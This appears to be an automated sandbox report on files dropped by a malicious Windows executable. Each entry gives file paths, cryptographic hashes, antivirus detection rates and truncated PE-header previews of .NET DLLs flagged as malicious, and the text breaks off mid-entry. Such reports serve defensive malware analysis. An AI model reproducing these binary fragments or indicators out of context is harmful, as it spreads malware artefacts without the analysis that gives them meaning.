                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Joe Sandbox View:
                                                  • Filename: OisrvsB6Ea.exe, Detection: malicious, Browse
                                                  • Filename: 3XtEci4Mmo.exe, Detection: malicious, Browse
                                                  • Filename: HaLCYOFjMN.exe, Detection: malicious, Browse
                                                  • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse
                                                  • Filename: aW6kSsgdvv.exe, Detection: malicious, Browse
                                                  • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                  • Filename: kJrNOFEGbQ.exe, Detection: malicious, Browse
                                                  • Filename: lEwK4xROgV.exe, Detection: malicious, Browse
                                                  • Filename: zZ1Y43bxxV.exe, Detection: malicious, Browse
                                                  • Filename: VqGD18ELBM.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\Cbqwysdq.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):294912
                                                  Entropy (8bit):6.010605469502259
                                                  Encrypted:false
                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 11%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                  C:\Users\user\Desktop\CpWmZfmQ.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\EzsmZyRR.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\FMWMFGoj.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\FfNcgcmK.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):39936
                                                  Entropy (8bit):5.660491370279985
                                                  Encrypted:false
                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                  MD5:240E98D38E0B679F055470167D247022
                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\HFlvrDZi.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):38912
                                                  Entropy (8bit):5.679286635687991
                                                  Encrypted:false
                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\HpjdguSK.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):41472
                                                  Entropy (8bit):5.6808219961645605
                                                  Encrypted:false
                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\ICMDMDoc.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):34816
                                                  Entropy (8bit):5.636032516496583
                                                  Encrypted:false
                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\JVDTnZnD.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\LEzlimtY.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24576
                                                  Entropy (8bit):5.535426842040921
                                                  Encrypted:false
                                                  SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                  MD5:5420053AF2D273C456FB46C2CDD68F64
                                                  SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                  SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                  SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\LnsTTQzV.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):22016
                                                  Entropy (8bit):5.41854385721431
                                                  Encrypted:false
                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\MdBcJrhy.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):39936
                                                  Entropy (8bit):5.629584586954759
                                                  Encrypted:false
                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\NLuKuVnw.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):34304
                                                  Entropy (8bit):5.618776214605176
                                                  Encrypted:false
                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\QitkawpP.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\RYCtQXXs.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24064
                                                  Entropy (8bit):5.4346552043530165
                                                  Encrypted:false
                                                  SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                  MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                  SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                  SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                  SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 6%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\TEXjXBsl.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\VOtkXUXl.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):22016
                                                  Entropy (8bit):5.41854385721431
                                                  Encrypted:false
                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\VWLjDtED.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):50176
                                                  Entropy (8bit):5.723168999026349
                                                  Encrypted:false
                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\WLUssUmg.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
